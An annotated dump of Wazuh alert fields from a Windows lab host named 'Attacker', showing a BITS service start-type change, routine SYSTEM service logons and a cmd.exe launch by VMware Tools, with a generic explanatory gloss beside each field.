data.win.eventdata.imagePath: \\SystemRoot\\System32\\drivers\\bthpan.sys No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceType: kernel mode driver No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.startType: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533908.269386 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:20.5278944Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2970 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 3052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533914.271196 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:18.2062622Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43568 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9432 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533914.278532 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:42:38.4198684Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43571 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows command prompt started by an abnormal process Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92052 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533920.285870 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:36:53.8873601Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 212029 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-17 16:36:53.853
ProcessGuid: {94294ddc-2e25-6801-d807-000000000e00}
ProcessId: 4044
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
CurrentDirectory: C:\WINDOWS\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00}
ParentProcessId: 3220
ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:36:53.853 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-2e25-6801-d807-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows Command Processor No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: Cmd.Exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS\\system32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533921.291489 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:45:35.6047549Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43630 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533922.298825 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:45:41.3826372Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43632 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
